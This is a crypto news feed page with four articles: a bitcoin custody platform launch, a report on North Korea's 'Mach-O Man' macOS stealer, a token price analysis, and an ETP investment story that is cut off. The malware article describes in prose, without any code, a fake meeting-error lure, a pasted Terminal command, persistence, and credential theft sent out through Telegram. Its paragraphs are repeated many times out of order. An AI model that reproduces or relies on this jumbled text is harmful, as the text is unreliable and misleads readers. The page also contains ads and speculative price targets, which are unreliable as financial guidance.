hodler

22 Apr 2026, 12:31

Onramp Launches New Bitcoin Finance Platform for BTC-Native Services

Onramp, the Austin-based bitcoin custody and advisory firm, launched Onramp Finance on April 21, 2026, a unified platform combining cash management, bitcoin brokerage across all 50 states, bitcoin IRAs, direct gold ownership, and a spending card into a single interface. The core question the launch raises: as institutional Bitcoin demand continues to accelerate , is the real infrastructure gap not custody or price exposure, but the fragmented financial rails surrounding long-term BTC holders? Key Takeaways: Platform launch: Onramp Finance went live April 21, 2026, consolidating banking, brokerage, custody, and retirement into one interface. Yield and rewards: Cash accounts offer up to 5% rewards funded by Onramp; spending card returns up to 1.5% cash back. Custody infrastructure: Multi-provider model spans BitGo, Coinbase, Coincover, and Tetra, with insurance through Lloyd’s of London. Genesis Program: Capped at 210 participants; requires a minimum 2 BTC deposit and a qualifying trade of at least $100 within 30 days. Target market: Long-term wealth builders and high-net-worth individuals treating bitcoin as a multi-decade holding, not a speculative trade. Discover: The best crypto to diversify your portfolio with How Onramp Finance Actually Works – and What the Architecture Signals The platform organizes its services around three functions: earning, accumulating, and spending. Users park cash in accounts earning up to 5% in Onramp-funded rewards, discretionary, not guaranteed interest, then route funds into bitcoin or gold, with cash-back rewards from the spending card redeployable into those same asset buckets. Custody sits on a multi-institution model spanning BitGo, Coinbase, Coincover, and Tetra, with Lloyd’s of London providing insurance coverage. That architecture eliminates single-point-of-failure risk that has historically plagued exchange-based custody, a direct structural response to the collapses that defined 2022. Two launches today. One lets you trade 24/7 perpetual futures on anything. One helps you earn on your cash, own bitcoin on the strongest custody architecture ever built, and preserve wealth across decades. The contrast is deafening. Speculation or savings. Pick your platform. https://t.co/3VgY0o12d0 pic.twitter.com/4FxOyOWyTP — Michael Tanguma (@MTanguma) April 21, 2026 The Genesis Program layers early-adopter incentives on top: no-fee custody vault for one year, early product access, and direct contact with company leadership, all for a minimum 2 BTC deposit and a qualifying $100 trade within 30 days. Slots fill in trade-execution order, capped at 210 participants. CEO Michael Tanguma framed the launch around long-horizon wealth principles rather than market timing. His position is unambiguous: “Sound financial planning has always rested on a few simple ideas. Live on less than you make. Put the rest into things that hold their value. Pass them on intelligently.” That framing matters – it signals Onramp is explicitly not competing for the active-trader segment. Discover: The best pre-launch token sales The post Onramp Launches New Bitcoin Finance Platform for BTC-Native Services appeared first on Cryptonews .

22 Apr 2026, 12:14

North Korea’s Lazarus Group launches new malware kit targeting macOS users in crypto, fintech

The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The crypto card with no spending limits. Get 3% cashback and instant mobile payments. Claim your Ether.fi card.

22 Apr 2026, 12:13

Can the $100K PIERVERSE Binance competition spark recovery?

PIERVERSE (PIER) has seen sharp volatility over the past few days, transitioning from a strong rally into a correction before stabilising in a recovery range. The price swings followed market reaction to earlier speculation and the launch of a new trading competition. The token initially surged from $0.429 to a peak of $1.49, before reversing sharply. It has since stabilised around $0.9311, indicating a partial recovery after the pullback, though volatility remains elevated. Sharp rally followed by aggressive correction The first major move in PIERVERSE came when the token climbed rapidly from $0.429 to $1.49. The rally unfolded in a short timeframe and was driven by intense speculative inflows and its listing on Upbit , one of the largest cryptocurrency exchanges in South Korea. That listing triggered a significant repricing phase, culminating in an all-time high of $1.49 on April 20, 2026. However, the move was short-lived. Once the price reached its peak, selling pressure increased sharply, leading to a near-full retracement of the advance. PIERVERSE dropped back toward the $0.69 region, effectively erasing most of the rally gains in a single corrective phase. This type of price action is typically seen when early buyers and short-term traders exit positions after a fast upward move, especially in markets where liquidity is concentrated around event-driven speculation rather than steady accumulation. Despite the steep correction, the token did not continue lower for long. Bulls gradually returned to the market, helping stabilise the price near the $0.90 region, where it currently trades around $0.926. $100K trading competition adds a second wave of activity Binance Wallet has launched the Pieverse Protocol Trading Competition on Binance Alpha, and during the promotion periods, users can trade PIEVERSE in their Binance Wallet (Keyless) or via Binance Alpha to receive exclusive token rewards. Since the competition began, trading volume has remained elevated, with daily activity exceeding $115 million at press time. This level of turnover reflects strong participation from traders responding to incentives rather than passive holding behaviour. The competition has helped prevent a deeper decline after the correction, instead pushing the market into a tighter consolidation range between approximately $0.86 and $0.98. While it has not created a new breakout, it has clearly increased liquidity and reduced downward pressure in the short term. Market behaviour shows ongoing consolidation after volatility The current price structure suggests that PIERVERSE is still working through a post-expansion stabilisation phase. After moving from $0.429 to $1.49, and then correcting sharply, the market is now attempting to form a temporary base above the $0.90 level. Trading activity remains elevated, but direction remains uncertain. Although the $100K competition has helped maintain liquidity, it has not been enough to establish a sustained upward trend. The market is also being influenced by broader crypto conditions, particularly Bitcoin’s performance , which continues to affect liquidity flows into altcoins. In periods of Bitcoin strength, altcoins like PIERVERSE typically experience improved short-term momentum, while weakness tends to expose fragile support levels. PIERVERSE price forecast The key level to watch in the short term is $0.8630. This zone acts as the immediate support boundary for the current consolidation structure. As long as PIERVERSE holds above this level, the market may continue to stabilise and attempt a rebound. If support holds, the next upside targets are $0.99 and $1.08. A move through these levels would indicate improving short-term momentum and could allow the price to test $1.28, which remains a strong resistance area based on prior selling pressure. On the downside, a clean breakdown below $0.8630 would shift focus toward $0.8456, which represents the next liquidity area where buyers may attempt to step in again. Continued weakness below that level would suggest that the post-rally correction phase is extending further. The post Can the $100K PIERVERSE Binance competition spark recovery? appeared first on Invezz

22 Apr 2026, 12:00

Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange

BitcoinWorld Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange Frankfurt, Germany – In a significant development for regulated cryptocurrency access, the Valour Hedera (HBAR) Exchange Traded Product (ETP) has secured a substantial $11 million institutional investment. This capital infusion, announced by Valour, a subsidiary of DeFi Technologies, demonstrates growing institutional confidence in the Hedera network. The investment specifically targets Valour’s HBAR ETP listed on the prestigious Börse Frankfurt. Consequently, this move signals a maturing phase for digital asset investment vehicles within traditional European finance. Valour HBAR ETP Attracts Major Institutional Capital The $11 million investment represents a clear vote of confidence from institutional investors. Specifically, $10 million flowed directly into the “Valour Hedera (HBAR) ETP” on the Börse Frankfurt. Additionally, $1 million entered the “Valour Hedera SEK” product on Sweden’s Spotlight Exchange. Valour executed these purchases at prevailing market prices. This strategic allocation highlights targeted interest in gaining regulated exposure to the Hedera Hashgraph ecosystem. Furthermore, it underscores the pivotal role of established stock exchanges in bridging digital and traditional assets. Exchange Traded Products provide a familiar, regulated framework for investors. They eliminate the technical complexities of direct cryptocurrency custody. Valour’s ETPs track the underlying asset’s price, offering a seamless investment experience. The Börse Frankfurt, one of Europe’s largest trading venues, provides crucial liquidity and credibility. This listing therefore validates HBAR as an institutional-grade asset within a stringent regulatory environment. Understanding the Hedera Hashgraph Ecosystem Hedera Hashgraph is a public distributed ledger technology. It distinguishes itself through its unique hashgraph consensus algorithm. This system promises high throughput, low fees, and predictable network governance. The HBAR token serves as the network’s native cryptocurrency. It fuels transactions, secures the network, and enables governance participation. Major corporations, including Google, IBM, and Deutsche Telekom, govern the Hedera Council. This governance model aims to ensure stability and enterprise-grade reliability. The network supports various decentralized applications (dApps). These span sectors like supply chain, payments, and digital identity. For instance, The Coupon Bureau uses Hedera for real-time retail coupon validation. Similarly, ServiceNow integrates Hedera for certified workflow documents. This enterprise-focused development pipeline provides fundamental utility for the HBAR token. Institutional investors likely assess this real-world adoption alongside pure market speculation. Expert Analysis on Institutional Crypto Adoption Financial analysts view this investment as part of a broader trend. “Institutional capital seeks regulated, transparent entry points,” notes a report from Bloomberg Intelligence. “Listed ETPs on major exchanges like Frankfurt meet this demand perfectly.” The European market has been particularly receptive to crypto ETPs. Products tracking Bitcoin and Ethereum have seen consistent inflows since 2020. The success of the Valour HBAR ETP now expands this trend to alternative layer-1 protocols. Data from CryptoCompare shows ETP assets under management (AUM) growing steadily. European products often feature physically-backed structures. This means the issuer holds the actual cryptocurrency for each share. This structure contrasts with futures-based products common in the United States. Physical backing can reduce tracking error and counterparty risk. Consequently, it appeals to long-term, value-oriented institutional portfolios. The Strategic Role of DeFi Technologies and Valour Valour operates as a key subsidiary of DeFi Technologies Inc., a publicly traded company. DeFi Technologies focuses on bridging decentralized finance with traditional capital markets. The company’s strategy involves creating, managing, and offering digital asset investment products. Valour’s product suite includes ETPs for Bitcoin, Ethereum, Cardano, and now prominently, Hedera. Each product provides a simple, secure, and accessible investment pathway. Key advantages of the Valour ETP structure include: Regulatory Compliance: Full adherence to EU financial regulations. Custody Security: Assets held with regulated, institutional-grade custodians. Exchange Access: Trading through conventional brokerage accounts. Transparent Pricing: Real-time NAV calculation and public reporting. This infrastructure lowers the barrier to entry for pension funds, asset managers, and family offices. It transforms a digital asset into a recognizable security. The $11 million investment validates this business model’s effectiveness. It also suggests strong investor appetite for diversified crypto exposure beyond the largest two assets. Market Impact and Future Trajectory for HBAR The immediate market impact provides a tangible demand signal. A single $10 million purchase represents significant volume for the ETP. It directly increases the product’s assets under management. This growth enhances liquidity and tightens bid-ask spreads. Over time, sustained institutional interest can contribute to price discovery and stability for the underlying HBAR token. Moreover, it encourages other asset managers to consider similar products. The investment timeline coincides with broader developments in the Hedera ecosystem. Recent network upgrades have improved smart contract functionality. Furthermore, stablecoin issuers are exploring the network for its low-cost settlement. These technical and fundamental improvements create a compelling investment thesis. Institutional capital often acts on such multi-factor analyses rather than short-term momentum. Comparative Overview of European Crypto ETP Listings Asset Primary Exchange Issuer Product Type Bitcoin (BTC) Börse Frankfurt, SIX Multiple Physically-backed ETP Ethereum (ETH) Börse Frankfurt, SIX 21Shares, Valour Physically-backed ETP Hedera (HBAR) Börse Frankfurt Valour Physically-backed ETP Cardano (ADA) Börse Frankfurt Valour Physically-backed ETP This table illustrates Hedera’s position among other major digital assets with regulated European listings. The presence on a major exchange like Frankfurt is a key milestone. It often precedes wider adoption by larger, more conservative financial institutions. Conclusion The $11 million institutional investment into the Valour HBAR ETP marks a definitive step forward. It validates Hedera Hashgraph’s enterprise-focused approach within the traditional financial system. The capital deployment through the regulated framework of the Börse Frankfurt underscores a maturation in crypto investment channels. This development likely signals continued institutional exploration of alternative layer-1 blockchain assets. Ultimately, the success of the Valour HBAR ETP 